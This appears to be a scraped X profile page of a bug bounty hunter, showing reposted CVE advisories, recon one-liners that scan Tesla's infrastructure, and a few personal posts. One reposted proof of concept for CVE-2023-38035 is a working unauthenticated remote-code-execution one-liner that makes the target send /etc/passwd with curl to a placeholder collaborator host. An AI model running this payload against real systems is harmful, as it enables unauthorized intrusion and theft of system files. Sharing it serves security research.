@0x240x23elu Profile picture

0x240x23elu (Shailesh Kumavat)

@0x240x23elu

Network Engineer #hackerone #bugcrowd .learning new things

Joined August 2018
Similar User
pikpikcu photo

@pikpikcu

Dhiyaneshwaran photo

@DhiyaneshDK

AEMSecurity photo

@AEMSecurity

Vegeta photo

@_justYnot

pwnmachine photo

@princechaddha

Udit Bhadauria photo

@udit_thakkur

ChevyPicks 🏈 🦍 🏀 photo

@ChevyPicks

Ciarán Cotter photo

@monkehack

~Ankit Tiwari photo

@Debian_Hunter

Sharik Khan photo

@4non_Hunter

me_dheeraj photo

@Dheerajmadhukar

Yogesh Ojha 🚀 photo

@ojhayogesh11

Muhammad Julfikar Hyder🇵🇸 photo

@thejulfikar

Samuel photo

@sign3tsh3l1

Aman Mahendra photo

@amanmahendra_

#RatanTata: A visionary leader and True Icon has passed away at 86. His visionary leadership shaped India’s corporate world. A major loss for the nation. End of an era!! REST IN PEACE SIR. 💔🙏


Frustrated with the lack of support from @Hostinger Reliable service is key, and this just isn’t it. 😡 #WebHosting #CustomerServiceFail


0x240x23elu (Shailesh Kumavat) Reposted

INTRODUCING: Agentic Security - LLM Security Scanner! 🔍 🔑 Features: Scans for prompt injections, jailbreaking & more. Provides detailed reports & options to customize attack rules. 🔗access the GitHub Link ↓


0x240x23elu (Shailesh Kumavat) Reposted

CVE-2024-36991: Path Traversal on the "/modules/messaging/" endpoint in Splunk Enterprise on Windows #CVE #bugbountytips advisory.splunk.com/advisories/SVD…

sirifu4k1's tweet image. CVE-2024-36991:
Path Traversal on the "/modules/messaging/" endpoint in Splunk Enterprise on Windows
#CVE #bugbountytips 
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/fdf0cp6zCE">advisory.splunk.com/advisories/SVD…</a>
sirifu4k1's tweet image. CVE-2024-36991:
Path Traversal on the "/modules/messaging/" endpoint in Splunk Enterprise on Windows
#CVE #bugbountytips 
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/fdf0cp6zCE">advisory.splunk.com/advisories/SVD…</a>
sirifu4k1's tweet image. CVE-2024-36991:
Path Traversal on the "/modules/messaging/" endpoint in Splunk Enterprise on Windows
#CVE #bugbountytips 
<a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/fdf0cp6zCE">advisory.splunk.com/advisories/SVD…</a>

CVE-2023-38035 - Unauth. RCE Thanks @win3zz python file gist.github.com/0x240x23elu/a2…

CVE-2023-38035 - Unauth. RCE PoC: 👇 python3 -c "from pyhessian.client import HessianProxy as H; H('https://TARGET-DOMAIN:8443/mics/services/MICSLogService').uploadFileUsingFileInput({'command': 'curl -X POST -d @/etc/passwd BURP-COLLABORATOR-URL.com', 'isRoot': True}, None)"

win3zz's tweet image. CVE-2023-38035 - Unauth. RCE

PoC: 👇
python3 -c "from pyhessian.client import HessianProxy as H; H('https://TARGET-DOMAIN:8443/mics/services/MICSLogService').uploadFileUsingFileInput({'command': 'curl -X POST -d @/etc/passwd <a style="text-decoration: none;" rel="nofollow" target="_blank" href="https://t.co/ZhRonPoqrv">BURP-COLLABORATOR-URL.com</a>', 'isRoot': True}, None)"


Do you remember when you joined X? I do! #MyXAnniversary

0x240x23elu's tweet image. Do you remember when you joined X? I do! #MyXAnniversary

Do you remember when you joined Twitter? I do! #MyTwitterAnniversary

0x240x23elu's tweet image. Do you remember when you joined Twitter? I do! #MyTwitterAnniversary

0x240x23elu (Shailesh Kumavat) Reposted

sub enum: subfinder -d tesla(.)com |tlsx -nc -silent -so |awk '{for(i=2; i<=NF; i++) printf "%s ", $i; print ""}'| tr -d '[],' |sort -uf Use uncover to search org names in Shodan and nuclei scan them: export SHODAN_API_KEY=XXX nuclei -nc -uc -uq 'org:"Tesla Motors Inc"' -silent

nullenc0de's tweet image. sub enum:
subfinder -d tesla(.)com |tlsx -nc -silent -so |awk '{for(i=2; i&lt;=NF; i++) printf "%s ", $i; print ""}'| tr -d '[],' |sort -uf

Use uncover to search org names in Shodan and nuclei scan them:

export SHODAN_API_KEY=XXX
nuclei -nc -uc -uq 'org:"Tesla Motors Inc"' -silent

My New #CVE is coming CVE-2021-34061 for: ** RESERVED ** Cross site scripting (XSS) vulnerability in ONT Earth-4220RF E4220-2.0.1-R allows attackers to execute arbitrary code via the ping feature on the diagnostics tab. #bugbountytips #bug


Loading...

Something went wrong.


Something went wrong.